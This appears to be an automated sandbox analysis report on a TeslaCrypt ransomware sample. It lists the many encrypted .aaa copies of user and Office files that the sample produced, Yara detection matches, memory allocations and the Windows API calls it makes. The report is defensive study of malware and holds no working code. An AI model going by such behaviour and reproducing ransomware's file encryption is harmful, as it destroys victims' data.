Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS entropy: 7.99857325215Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS entropy: 7.99835890105Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS entropy: 7.99828105473Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS entropy: 7.99853735855Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS entropy: 7.99847590861Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS entropy: 7.99852420294Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma entropy: 7.99865717812Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma entropy: 7.99902155912Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma entropy: 7.99809516643Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma entropy: 7.99846157312Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma entropy: 7.99845347598Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma entropy: 7.9978872642Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma entropy: 7.99803712892Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma entropy: 7.99867766644Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma entropy: 7.999182213Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma entropy: 7.9979625803Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txt entropy: 7.99227459144Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS entropy: 7.99840356829Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg entropy: 7.9997835652Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txt.aaa (copy) entropy: 7.99227459144Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Desert.jpg.aaa (copy) entropy: 7.99981692554Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Koala.jpg.aaa (copy) entropy: 7.99976664486Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Tulips.jpg.aaa (copy) entropy: 7.99972856389Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Videos\Sample Videos\Wildlife.wmv.aaa (copy) entropy: 7.99999356046Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 01.wma.aaa (copy) entropy: 7.99902155912Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 02.wma.aaa (copy) entropy: 7.99865717812Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 03.wma.aaa (copy) entropy: 7.9979625803Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 04.wma.aaa (copy) entropy: 7.999182213Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 05.wma.aaa (copy) entropy: 7.99867766644Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 06.wma.aaa (copy) entropy: 7.99803712892Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 07.wma.aaa (copy) entropy: 7.9978872642Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 08.wma.aaa (copy) entropy: 7.99845347598Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 09.wma.aaa (copy) entropy: 7.99846157312Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 10.wma.aaa (copy) entropy: 7.99809516643Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Chrysanthemum.jpg.aaa (copy) entropy: 7.9997835652Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Hydrangeas.jpg.aaa (copy) entropy: 7.99962859933Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Jellyfish.jpg.aaa (copy) entropy: 7.99975745316Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Lighthouse.jpg.aaa (copy) entropy: 7.9996345211Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Penguins.jpg.aaa (copy) entropy: 7.99978839619Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.aaa (copy) entropy: 7.9939746792Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.aaa (copy) entropy: 7.99907789331Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.aaa (copy) entropy: 7.99793205067Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.aaa (copy) entropy: 7.99855482405Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aaa (copy) entropy: 7.99812244886Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.aaa (copy) entropy: 7.99826779297Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.aaa (copy) entropy: 7.9986631482Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.aaa (copy) entropy: 7.99498755716Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.aaa (copy) entropy: 7.99555950859Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.aaa (copy) entropy: 7.9933009054Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aaa (copy) entropy: 7.99346154842Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aaa (copy) entropy: 7.99398845138Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aaa (copy) entropy: 7.99457692256Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aaa (copy) entropy: 7.9960715748Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aaa (copy) entropy: 7.99615524232Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aaa (copy) entropy: 7.99335614851Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aaa (copy) entropy: 7.99304092425Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aaa (copy) entropy: 7.99584705514Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aaa (copy) entropy: 7.99583914772Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aaa (copy) entropy: 7.99637860205Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aaa (copy) entropy: 7.99141931749Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aaa (copy) entropy: 7.99187987277Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS.aaa (copy) entropy: 7.99846981057Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.aaa (copy) entropy: 7.99816803998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS.aaa (copy) entropy: 7.99854133731Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS.aaa (copy) entropy: 7.99834570599Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS.aaa (copy) entropy: 7.99862577944Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS.aaa (copy) entropy: 7.99849409282Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS.aaa (copy) entropy: 7.99853735073Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS.aaa (copy) entropy: 7.99830826167Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.aaa (copy) entropy: 7.99853367769Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS.aaa (copy) entropy: 7.99878340885Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS.aaa (copy) entropy: 7.99874519912Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS.aaa (copy) entropy: 7.99844522652Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS.aaa (copy) entropy: 7.99856499915Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS.aaa (copy) entropy: 7.99837423835Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS.aaa (copy) entropy: 7.99816329199Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS.aaa (copy) entropy: 7.99859076703Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS.aaa (copy) entropy: 7.99817283998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.aaa (copy) entropy: 7.99872843695Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS.aaa (copy) entropy: 7.99853816402Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS.aaa (copy) entropy: 7.99850966224Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS.aaa (copy) entropy: 7.99834186383Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.aaa (copy) entropy: 7.99865503926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS.aaa (copy) entropy: 7.99859273255Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS.aaa (copy) entropy: 7.99852672413Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS.aaa (copy) entropy: 7.99857252149Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS.aaa (copy) entropy: 7.99833876446Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.aaa (copy) entropy: 7.99825322135Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS.aaa (copy) entropy: 7.99852619771Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS.aaa (copy) entropy: 7.99866799757Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS.aaa (copy) entropy: 7.99849458796Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS.aaa (copy) entropy: 7.99827898335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.aaa (copy) entropy: 7.99831007926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.aaa (copy) entropy: 7.99851675108Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.aaa (copy) entropy: 7.99830785461Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.aaa (copy) entropy: 7.99871655061Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS.aaa (copy) entropy: 7.99854234655Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS.aaa (copy) entropy: 7.99864581495Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS.aaa (copy) entropy: 7.99869433103Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS.aaa (copy) entropy: 7.99836415506Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.aaa (copy) entropy: 7.99825910238Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS.aaa (copy) entropy: 7.99858776273Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.aaa (copy) entropy: 7.99827717241Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS.aaa (copy) entropy: 7.99847625719Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS.aaa (copy) entropy: 7.99878808928Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS.aaa (copy) entropy: 7.99844741889Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS.aaa (copy) entropy: 7.99841106271Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS.aaa (copy) entropy: 7.99857325215Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS.aaa (copy) entropy: 7.99835890105Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS.aaa (copy) entropy: 7.99828105473Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.aaa (copy) entropy: 7.99853735855Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS.aaa (copy) entropy: 7.99847590861Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS.aaa (copy) entropy: 7.99852420294Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS.aaa (copy) entropy: 7.99841576897Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.aaa (copy) entropy: 7.998399262Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.aaa (copy) entropy: 7.9984901335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS.aaa (copy) entropy: 7.99840356829Jump to dropped file

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 2.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0.2.0t8amSU3vd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.2c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0.2.0t8amSU3vd.exe.520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0.2.0t8amSU3vd.exe.520000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 2.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\0t8amSU3vd.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041ED00 SHGetFolderPathW,GetModuleHandleW,RtlGetVersion,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcessId,LoadIconW,RegisterClassExW,VirtualProtect,InterlockedExchange,CreateWindowExW,GetStartupInfoW,ExpandEnvironmentStringsW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,GetMessageW,TranslateMessage,GetMessageW,TranslateMessage,DispatchMessageW,UnregisterClassW,ExitProcess,0_2_0041ED00
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041EA80 GetProcessHeap,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetSystemDirectoryA,_strcpy_s,GetProcessHeap,HeapFree,LoadLibraryExA,GetProcAddress,FreeLibrary,GetProcessHeap,HeapFree,0_2_0041EA80
